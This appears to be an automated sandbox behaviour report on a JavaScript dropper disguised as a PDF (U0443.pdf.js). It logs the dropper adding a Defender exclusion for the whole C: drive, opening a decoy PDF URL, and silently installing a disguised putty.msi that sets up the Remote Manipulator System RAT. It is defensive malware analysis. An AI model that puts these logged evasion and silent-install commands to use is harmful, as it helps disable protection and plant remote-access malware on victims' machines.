          Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
          Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49675
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49690 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 217.21.85.207:443 -> 192.168.2.5:49691 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 217.21.85.207:443 -> 192.168.2.5:49692 version: TLS 1.2
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A1D627669EFC8CD4F21BCF387D97F9B5_E818918BC57803438E0E0146A88425A7Jump to dropped file
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BD92F95DED26541D3AF7F44DC7914843Jump to dropped file
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A62E94087F64223B9812F11186592BAJump to dropped file
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_6C354C532D063DF5607A63BA827F5164Jump to dropped file
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0766DB9AB186806BB9A6B6802D3BA734Jump to dropped file
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_50385F8EB1F713E33924A830D7A2A41CJump to dropped file

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 39.0.rfusclient.exe.bb0000.0.unpack, type: UNPACKEDPEMatched rule: RemoteUtilitiesRAT RAT payload Author: ditekSHen
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe, type: DROPPEDMatched rule: RemoteUtilitiesRAT RAT payload Author: ditekSHen
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe, type: DROPPEDMatched rule: RemoteUtilitiesRAT RAT payload Author: ditekSHen
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir4952_351580900Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4b3d1b.msi
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI44FB.tmp
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{65007958-166B-4F52-87F6-0C61CE20EB5C}
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI46B1.tmp
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4b3d1e.msi
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4b3d1e.msi
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\ARPPRODUCTICON.exe
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_start_C00864331B9D4391A8A26292A601EBE2.exe
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0766DB9AB186806BB9A6B6802D3BA734
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0766DB9AB186806BB9A6B6802D3BA734
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4A62E94087F64223B9812F11186592BA
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A62E94087F64223B9812F11186592BA
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A1D627669EFC8CD4F21BCF387D97F9B5_E818918BC57803438E0E0146A88425A7
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A1D627669EFC8CD4F21BCF387D97F9B5_E818918BC57803438E0E0146A88425A7
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_50385F8EB1F713E33924A830D7A2A41C
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BD92F95DED26541D3AF7F44DC7914843
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BD92F95DED26541D3AF7F44DC7914843
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_50385F8EB1F713E33924A830D7A2A41C
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_6C354C532D063DF5607A63BA827F5164
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_6C354C532D063DF5607A63BA827F5164
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir4952_351580900
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B35CBD039_2_6B35CBD0
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B35D62039_2_6B35D620
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B41E26039_2_6B41E260
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B35DC0039_2_6B35DC00
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B36580039_2_6B365800
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B36A25039_2_6B36A250
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B36809039_2_6B368090
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B3F708039_2_6B3F7080
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B365AE039_2_6B365AE0
          Source: U0443.pdf.jsInitial sample: Strings found which are bigger than 50
          Source: unires_vpd.dll.34.drStatic PE information: Resource name: None type: COM executable for DOS
          Source: rutserv.exe.34.drStatic PE information: Resource name: RT_RCDATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: rfusclient.exe.34.drStatic PE information: Resource name: RT_STRING type: PDP-11 separate I&D executable not stripped
          Source: rfusclient.exe.34.drStatic PE information: Resource name: RT_RCDATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: unidrvui_rppd.dll0.34.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: unires_vpd.dll0.34.drStatic PE information: Resource name: None type: COM executable for DOS
          Source: libcodec32.dll.34.drStatic PE information: Number of sections : 20 > 10
          Source: rfusclient.exe.34.drStatic PE information: Number of sections : 11 > 10
          Source: rutserv.exe.34.drStatic PE information: Number of sections : 11 > 10
          Source: libasset32.dll.34.drStatic PE information: Number of sections : 19 > 10
          Source: unires_vpd.dll0.34.drStatic PE information: No import functions for PE file found
          Source: unires_vpd.dll.34.drStatic PE information: No import functions for PE file found
          Source: 39.0.rfusclient.exe.bb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RemoteUtilitiesRAT author = ditekSHen, description = RemoteUtilitiesRAT RAT payload, clamav_sig = MALWARE.Win.Trojan.RemoteUtilitiesRAT
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe, type: DROPPEDMatched rule: MALWARE_Win_RemoteUtilitiesRAT author = ditekSHen, description = RemoteUtilitiesRAT RAT payload, clamav_sig = MALWARE.Win.Trojan.RemoteUtilitiesRAT
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe, type: DROPPEDMatched rule: MALWARE_Win_RemoteUtilitiesRAT author = ditekSHen, description = RemoteUtilitiesRAT RAT payload, clamav_sig = MALWARE.Win.Trojan.RemoteUtilitiesRAT
          Source: unires_vpd.dll0.34.drStatic PE information: Section .rsrc
          Source: unires_vpd.dll.34.drStatic PE information: Section .rsrc
          Source: classification engineClassification label: mal100.troj.expl.evad.winJS@89/121@8/6
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\putty.msi
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeMutant created: \Sessions\1\BaseNamedObjects\Local\RManFUSTray
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3832:120:WilError_03
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeMutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1fc
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2280:120:WilError_03
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeMutant created: \Sessions\1\BaseNamedObjects\Local\RManFUSLocal
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeMutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$510
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeMutant created: \BaseNamedObjects\HookTThread$520
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_03
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeMutant created: \BaseNamedObjects\madExceptSettingsMtx$520
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeMutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$19b4
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeMutant created: \BaseNamedObjects\madExceptSettingsMtx$1680
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpjzntt2.0pw.ps1Jump to behavior
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: U0443.pdf.jsVirustotal: Detection: 9%
          Source: rfusclient.exeString found in binary or memory: MODULESDIR: "E:/dev/vcpkg/installed/x86-mingw-static/lib/ossl-modules"
          Source: rfusclient.exeString found in binary or memory: ENGINESDIR: "E:/dev/vcpkg/installed/x86-mingw-static/lib/engines-3"
          Source: rfusclient.exeString found in binary or memory: E:/dev/vcpkg/installed/x86-mingw-static/lib/ossl-modules
          Source: rfusclient.exeString found in binary or memory: E:/dev/vcpkg/installed/x86-mingw-static/lib/engines-3
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1828 /prefetch:3
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3092 /prefetch:8
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 85876F97EED0B7EDCFF1192CE7DC76A0
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" -msi_copy "C:\Users\user\AppData\Roaming\putty.msi"
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
          Source: unknownProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -service
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
